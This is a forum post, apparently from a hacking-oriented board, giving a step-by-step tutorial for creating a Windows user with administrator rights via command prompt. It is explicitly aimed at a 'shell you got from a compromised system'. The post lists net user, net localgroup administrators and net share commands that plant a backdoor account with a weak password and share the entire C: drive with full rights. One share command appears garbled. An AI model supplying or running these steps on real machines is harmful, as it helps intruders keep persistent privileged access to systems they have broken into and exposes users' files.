Members Login
Username 
 
Password 
    Remember Me  
Post Info TOPIC: How To Add User With Administrator Rights Using Command Prompt


Senior Member

Status: Offline
Posts: 319
Date:
How To Add User With Administrator Rights Using Command Prompt
Permalink Closed


Today actually I just finished my exam… Chinese exam was absolutely very hard mate, because you need to know and read the characters 

Okay just forget about my exam, today I just want to share a simple tips and trick for today, about "How to Add User With Administrator Rights Using Command Prompt". If you follow this tips and trick, maybe it will not exceed 1 minute, even for some of you can do it in less than 30 second

Ah I also just want to inform you that in next 2 articles(just wait for the update), I will post a tips and trick and also hackingtutorial about Remote Desktop (for some of you who don’t familiar with console, you will love it )

 

 

part 1 ==== it has been pup

This tips and trick will add a user with administrative rights, you will need it when you owned a system to add a user there.

Okay lets start it.

Requirement :

1. Command Prompt [or] shell you got from a compromised system

Step by Step :

1. Open your command prompt and type this command :

net user /add v4L 12345

The command above will add user name v4L with password 12345. If you just add until this step, you just add user with limited privilege.

2. The next step, we continue to add another command :

net localgroup administrators v4L /add

Now in this 2nd step, we add our user v4L to administrators group. Now this user already has an administrative rights.

3. We move again to the last 3rd step, now lets type again another command :

net share concfg*C:\/grant:v4L,full

or

net share SHARE_NAME=c:\ /grant:v4L,full

The command above will grant user name v4L will full grant, that’s mean v4L can do everything on the systemincluding see other users file 🙂

Hope it useful m8 🙂



__________________
Page 1 of 1  sorted by
 
Quick Reply

Please log in to post quick replies.

Tweet this page Post to Digg Post to Del.icio.us


Create your own FREE Forum
Report Abuse
Powered by ActiveBoard